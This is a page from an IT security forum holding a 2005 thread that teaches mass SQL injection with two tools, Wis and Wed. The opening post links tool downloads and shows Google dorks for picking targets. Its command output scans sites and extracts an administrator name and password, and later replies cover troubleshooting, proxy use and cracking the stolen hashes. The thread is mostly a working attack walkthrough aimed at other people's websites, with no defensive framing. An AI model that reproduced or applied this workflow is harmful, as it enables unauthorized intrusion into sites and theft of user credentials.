Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 55
Members: 0
Total: 55
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Sql injection tools Wed&Wis Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
Sql injection tools Wed&Wis
PostPosted: Thu Jan 13, 2005 4:02 pm Reply with quote
qr4t
Regular user
Regular user
Joined: Nov 21, 2004
Posts: 11
Location: Estonia




I found 2 tools to automate the sql injection process. I tested them and got some users/passwds Smile My tests also showed that it missed some sql injections Sad
Here's how to use them:
First i searched with google some asp sites like this "allinurl:/login.asp". Next i used Wis (Web Injection Scanner - searches web for sql injection) and if it found hole then i started Wed (Web Entry Detector) to exploit the injection. Tools can be downloaded from here:
http://www.hot.ee/qr4t/wis.rar
http://www.hot.ee/qr4t/wed.rar
It goes like this:

Code:

C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com


Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:
============================
/shownews.asp?newsid=204

C:\>


To detect access pages, put a "/A" to the end of command:

Code:

C:\>wis http://www.someaspsite.com/ /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
============================
/gansu2/login.asp (200 OK)

Scan Finished

C:\>


When you successfully find Sql Injection with Wis then next step is to use Wed and the vulnerable url:

Code:

C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####
Host:www.someaspsite.com
Page:/shownews.asp?newsid=1544

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn

C:\>


Happy Injecting Razz
View user's profile Send private message MSN Messenger
a
PostPosted: Thu Jan 13, 2005 10:28 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




nice found

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Fri Jan 14, 2005 7:08 pm Reply with quote
any2000
Active user
Active user
Joined: Dec 02, 2004
Posts: 26




very good toolz thanks qr4t Very Happy
View user's profile Send private message
This Tools is China Hacker rongxiao Public
PostPosted: Sat Jan 15, 2005 3:42 pm Reply with quote
firefox
Beginner
Beginner
Joined: Jan 15, 2005
Posts: 2




^_^

is very good
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Sat Jan 15, 2005 5:29 pm Reply with quote
Oguz
Regular user
Regular user
Joined: Nov 29, 2004
Posts: 7




super...
thanks...

_________________
{ [ NCT ] }
View user's profile Send private message
PostPosted: Tue Jan 18, 2005 5:35 am Reply with quote
proview
Beginner
Beginner
Joined: Jan 18, 2005
Posts: 1




Hi, the first of all, sorry for my very very very bad english Embarassed
Congratulations for the wis & wed programs. Very Happy
I have a problem. The first step with the wis, it's ok!, an example i got this:
Page Found: /admin/login.asp (401 AuthReq)
Page Found: /admin/default.asp (401 AuthReq)
Page Found: /admin/index.asp (401 AuthReq)
Page Found: /admin/manage.asp (401 AuthReq)

Access Page Final Result:
============================
/admin/manage.asp (401 AuthReq)
/admin/index.asp (401 AuthReq)
/admin/default.asp (401 AuthReq)
/admin/login.asp (401 AuthReq)

Now, I not that to do with these results, in step 2 with the wed program Crying or Very sad
Anyone can help me please?
Sorry one more time for my bad english Embarassed
View user's profile Send private message
What about using proxy with the wis usage ?
PostPosted: Tue Jan 18, 2005 3:34 pm Reply with quote
ToXiC
Moderator
Moderator
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




is there a -p or anything in the usage to use proxy .. ?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Tue Jan 18, 2005 6:09 pm Reply with quote
ToXiC
Moderator
Moderator
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




HEllo again ..i have run this expl from another pc and i have managed to get to the point where it is using brute force

Code:
#### Phrase 7: Starting Get Password Field ####
Tag: 332
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 5

#### Phrase 9: Starting Brute Field "administrators" and "pwd" (Access Mode) ###
#
Brute Force "administrators": ktu' "pwd": VB?<Y "!ln=Zry(),.v&kHJaEIKb(R$),Q<S>
C:\Documents and Settings\xxxx\Desktop\wed>


and while it is working the program crashes...any ideas y?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Fri Mar 18, 2005 9:53 pm Reply with quote
kunfuzed
Beginner
Beginner
Joined: Mar 18, 2005
Posts: 1




#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk







I have gotten the name and password but is it hashed? I cant log in with this info!
View user's profile Send private message
PostPosted: Tue Mar 29, 2005 8:46 am Reply with quote
safer
Regular user
Regular user
Joined: Jun 20, 2004
Posts: 5




it come from china!
View user's profile Send private message
admin.txt
PostPosted: Wed Mar 30, 2005 10:32 am Reply with quote
matrix2005
Beginner
Beginner
Joined: Feb 12, 2005
Posts: 3




whay i got this error admin.txt not fond ı have admin.txt in same directory can some one help me.. Question
View user's profile Send private message
PostPosted: Tue Jul 05, 2005 10:00 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18




wis seemed don't work for me , but wed , no problem .

understand.. when I launch wis , with or without param , the program stop , without checking anything.. no error message , nothing , just stop .
View user's profile Send private message
hashed password
PostPosted: Thu Jul 07, 2005 4:31 pm Reply with quote
neo_hack
Regular user
Regular user
Joined: Jul 04, 2005
Posts: 6




kunfuzed wrote:
#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk







I have gotten the name and password but is it hashed? I cant log in with this info!


Well if the password is hashed with md5 algorthm try using this:
http://www.securitylab.ru/tools/22140.html
If it is sha1 or not salted md5 try http://passcracking.com/
View user's profile Send private message
PostPosted: Thu Jul 07, 2005 6:10 pm Reply with quote
diaga
Regular user
Regular user
Joined: Jun 27, 2005
Posts: 22




downloaded it, how do i use it?
View user's profile Send private message
md5
PostPosted: Thu Jul 14, 2005 12:37 pm Reply with quote
neo_hack
Regular user
Regular user
Joined: Jul 04, 2005
Posts: 6




md5crack xxx
xxx - type your hash here
View user's profile Send private message
Sql injection tools Wed&Wis
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.049 Seconds